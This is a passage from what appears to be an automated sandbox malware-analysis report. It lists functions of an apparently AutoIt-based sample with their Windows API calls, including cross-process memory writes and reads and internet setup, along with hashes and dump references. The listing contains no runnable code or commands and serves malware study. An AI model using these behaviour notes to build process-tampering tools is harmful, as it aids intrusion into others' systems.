                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: d8a2e27f145b2905731912665fae47dbf16efa0dc4ad8df7543bc4f6170396eb
                                                                                                                      • Instruction ID: 17aed72d3fef99c005a100d088cfc0578b17ec2e9e919a8e3b9d88d073a25544
                                                                                                                      • Opcode Fuzzy Hash: d8a2e27f145b2905731912665fae47dbf16efa0dc4ad8df7543bc4f6170396eb
                                                                                                                      • Instruction Fuzzy Hash: FA21D376A0020AEFCB15DFA4C840CAABBB6FB4D340B004566FE15A7360D7359921DBA8
                                                                                                                      Function 003F53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003F544C
                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003F5475
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                      • String ID: <local>
                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                      • Opcode ID: b57ba4a2a3bd2cdc9796e1f4074d475f3a223ebdba023f35427f98614acfe070
                                                                                                                      • Instruction ID: a23f848d55d23e3fd9b536faa83246920c5e376fadf86ca18fe9953adaf848f1
                                                                                                                      • Opcode Fuzzy Hash: b57ba4a2a3bd2cdc9796e1f4074d475f3a223ebdba023f35427f98614acfe070
                                                                                                                      • Instruction Fuzzy Hash: 4911A070541A29BADB268F528C84EFBFBACFF12752F10822AF74556440E3706984CAF0
                                                                                                                      Function 004090BE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00409134
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u$button
                                                                                                                      • API String ID: 3850602802-1762282863
                                                                                                                      • Opcode ID: e08f7b97a1881a85f798751e1887a47fd8e3b3ec028cf32ed9e559cd99ac37f5
                                                                                                                      • Instruction ID: bdbd30cde467c282c122323b0e79ee62fabe42ae5027f992d551388dede2bb00
                                                                                                                      • Opcode Fuzzy Hash: e08f7b97a1881a85f798751e1887a47fd8e3b3ec028cf32ed9e559cd99ac37f5
                                                                                                                      • Instruction Fuzzy Hash: 6311E532250206ABDF119F60CC01FEB376AFF18318F155525FA95AB2D1C27AEC61AB54
                                                                                                                      Function 003CB4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003D4557
                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 003D463E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                      • String ID: (F
                                                                                                                      • API String ID: 3761405300-3809367202
                                                                                                                      • Opcode ID: d9321227d9e5a8e606c714062ce467202f79930b4a0878579eaa8a4b60ddae63
                                                                                                                      • Instruction ID: 40c405dff9bd2c6b0ddf1c878d63f61eb25a313798d41be4006d75649e886dd1
                                                                                                                      • Opcode Fuzzy Hash: d9321227d9e5a8e606c714062ce467202f79930b4a0878579eaa8a4b60ddae63
                                                                                                                      • Instruction Fuzzy Hash: 0B211FB56003249BE304DF15F9926023BB5BB49310F10593AE5098B3A1F3F6A990CF8E
                                                                                                                      Function 0040A395 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000133E,00000000,?), ref: 0040A3E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 0e2de5aa722027669cc2fcfe50f2b451ce31e966affada5b523a845bb377cb07
                                                                                                                      • Instruction ID: 42ea9b7e1597b0b121ccc3c8149203a575c30596889fd9d0228200b3033705db
                                                                                                                      • Opcode Fuzzy Hash: 0e2de5aa722027669cc2fcfe50f2b451ce31e966affada5b523a845bb377cb07
                                                                                                                      • Instruction Fuzzy Hash: 1C112234500740AFDB20CF34C891AE7BBE5BF06304F10892EE9AAA73C1D7B46901DB62
                                                                                                                      Function 003DCC25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DC9FE,?,?,00000034,00000800,?,00000034), ref: 003E4D6B
                                                                                                                      • SendMessageW.USER32(?,0000102B,?,00000000), ref: 003DCC85
                                                                                                                      • SendMessageW.USER32(?,0000102B,?,00000000), ref: 003DCCA8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MemoryProcessWrite
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1195347164-2594219639
                                                                                                                      • Opcode ID: 3f88ff964646713ad780626c7be139dd8d8e78f96866f1415cc892403710c469
                                                                                                                      • Instruction ID: a828fa6086d804c1711c5207661012b518b5ead213acfbc19356f34049976973
                                                                                                                      • Opcode Fuzzy Hash: 3f88ff964646713ad780626c7be139dd8d8e78f96866f1415cc892403710c469
                                                                                                                      • Instruction Fuzzy Hash: 8801F972910129EBEB226F24EC86EEFBB7CDF04310F104166F515AB1D0DB706D41CA60
                                                                                                                      Function 003FACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: htonsinet_addr
                                                                                                                      • String ID: 255.255.255.255
                                                                                                                      • API String ID: 3832099526-2422070025
                                                                                                                      • Opcode ID: 51c0261f535bbd24845b79fde181f7afbccb55d99cb5802c6d5fa8da593b23b7
                                                                                                                      • Instruction ID: b56b659892b56b051b6bce826778d205ac77b7d44d66c1602aee43b7e7f8047c
                                                                                                                      • Opcode Fuzzy Hash: 51c0261f535bbd24845b79fde181f7afbccb55d99cb5802c6d5fa8da593b23b7
                                                                                                                      • Instruction Fuzzy Hash: F30145B5200308ABCB21DFA4C852FBDB3A8FF44720F10852AFA199B2C1C731E804C755
                                                                                                                      Function 003EC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                      • Opcode ID: f9f4342fc34b7b64410cfaa0f1cf85b3722269742124f4d9ef5860792c88bc87
                                                                                                                      • Instruction ID: a578e202155bb20a547024eef5628c3745f81889661c2a9c329cea58ee9cb31d
                                                                                                                      • Opcode Fuzzy Hash: f9f4342fc34b7b64410cfaa0f1cf85b3722269742124f4d9ef5860792c88bc87
                                                                                                                      • Instruction Fuzzy Hash: 2C01F9719002586EDB19C799CC16FFE7BF89B05311F00415EE153D61C1E474A7088B60
                                                                                                                      Function 003DCD4F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 003DCD75
                                                                                                                      • SendMessageW.USER32(?,0000040D,?,00000000), ref: 003DCDA8
                                                                                                                        • Part of subcall function 003E4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 003E4D36
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MemoryProcessRead_memmove
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 339422723-2594219639
                                                                                                                      • Opcode ID: 73d0b471696598a35942bbbb07b7d90be7a89593ec069c4471f0c44b8b8e264a
                                                                                                                      • Instruction ID: dbae56fc8c97ac9287752c66edb374494e973fba58d38cccc98d7bb55e21ce18
                                                                                                                      • Opcode Fuzzy Hash: 73d0b471696598a35942bbbb07b7d90be7a89593ec069c4471f0c44b8b8e264a
                                                                                                                      • Instruction Fuzzy Hash: 65016D72900128EFCB51AF54DC81EDA7BBDEB14340F50C0A6F549AB150DE305E89CB90
                                                                                                                      Function 003DCCB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003DCCC6
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003DCCDE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 252bf48be407629cb665ec7c94ec5c6968b77218ff25a45c6918d16c64144d4b
                                                                                                                      • Instruction ID: 7d8cac388e1cfec015853901762ffdb7a48ea213fb291457386e3f747184aa2f
                                                                                                                      • Opcode Fuzzy Hash: 252bf48be407629cb665ec7c94ec5c6968b77218ff25a45c6918d16c64144d4b
                                                                                                                      • Instruction Fuzzy Hash: F6E0E53237222376F23216116D4AFC76E098B48B10F111026BB08AB2D5CDD14C43C2A0
                                                                                                                      Function 003DD451 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003DD463
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 003DD493
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 3dd843bf7c0fa685ff26a0ab701f4980224b6bd09c0f5849896b76aea0d3a61e
                                                                                                                      • Instruction ID: 45ca6b71591d8028b431db213e8e578469f24d65a0a40efa8ae9ee73bc872745
                                                                                                                      • Opcode Fuzzy Hash: 3dd843bf7c0fa685ff26a0ab701f4980224b6bd09c0f5849896b76aea0d3a61e
                                                                                                                      • Instruction Fuzzy Hash: 50F0A772740304BBEA262E81FC47FA67B1DEB04795F104016F7051A1D0C9E26C105794
                                                                                                                      Function 003DD5CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DD0D4: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 003DD0ED
                                                                                                                        • Part of subcall function 003DD0D4: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003DD127
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 003DD5F2
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003DD602
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 35d24b42314d12f3bdbbcd6cf97e807f8c586e7b5bc22009106b590363681d6e
                                                                                                                      • Instruction ID: fc5f6cf2d7407c038f245d76380f19e4c9f3c7adfd24f90b2ea849fa5d8133d7
                                                                                                                      • Opcode Fuzzy Hash: 35d24b42314d12f3bdbbcd6cf97e807f8c586e7b5bc22009106b590363681d6e
                                                                                                                      • Instruction Fuzzy Hash: 63E0D8763083057FF6221A61BC4BEA77B1DDB48715F114036F70045190EEA3CC215568
                                                                                                                      Function 003E804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                      • String ID: #32770
                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                      • Opcode ID: 29ba0d90bb74e7203f6d191431d70742188409933cc8d2ec48c435802b204c71
                                                                                                                      • Instruction ID: 291131a341c7333485cf3c0aee713f8ef25ab25193f338304e9f247e9eea7ccb
                                                                                                                      • Opcode Fuzzy Hash: 29ba0d90bb74e7203f6d191431d70742188409933cc8d2ec48c435802b204c71
                                                                                                                      • Instruction Fuzzy Hash: 85E0D833A0022927D721EFA6DC4AFD7FBACEB517A5F10002AF914D3081EAB49A4587D4
                                                                                                                      Function 003CDA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __umatherr.LIBCMT ref: 003CDA2A
                                                                                                                        • Part of subcall function 003CDD86: __ctrlfp.LIBCMT ref: 003CDDE5
                                                                                                                      • __ctrlfp.LIBCMT ref: 003CDA47
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __ctrlfp$__umatherr
                                                                                                                      • String ID: xnA
                                                                                                                      • API String ID: 219961500-1594283989
                                                                                                                      • Opcode ID: 215b19be5948c5654cf95e4d04e0db9eeab3005a92eadf5bdd7dc35e3a343630
                                                                                                                      • Instruction ID: 60128f733be66a32ee3fc1812b5def0c0de01226487b276faff0ede9a646a880
                                                                                                                      • Opcode Fuzzy Hash: 215b19be5948c5654cf95e4d04e0db9eeab3005a92eadf5bdd7dc35e3a343630
                                                                                                                      • Instruction Fuzzy Hash: 29E0657140870AAEDB027F90E806B993BA5EF04310F8040A8F98C18496DFB28974D797
                                                                                                                      Function 003DB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003DB36B
                                                                                                                        • Part of subcall function 003C2011: _doexit.LIBCMT ref: 003C201B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
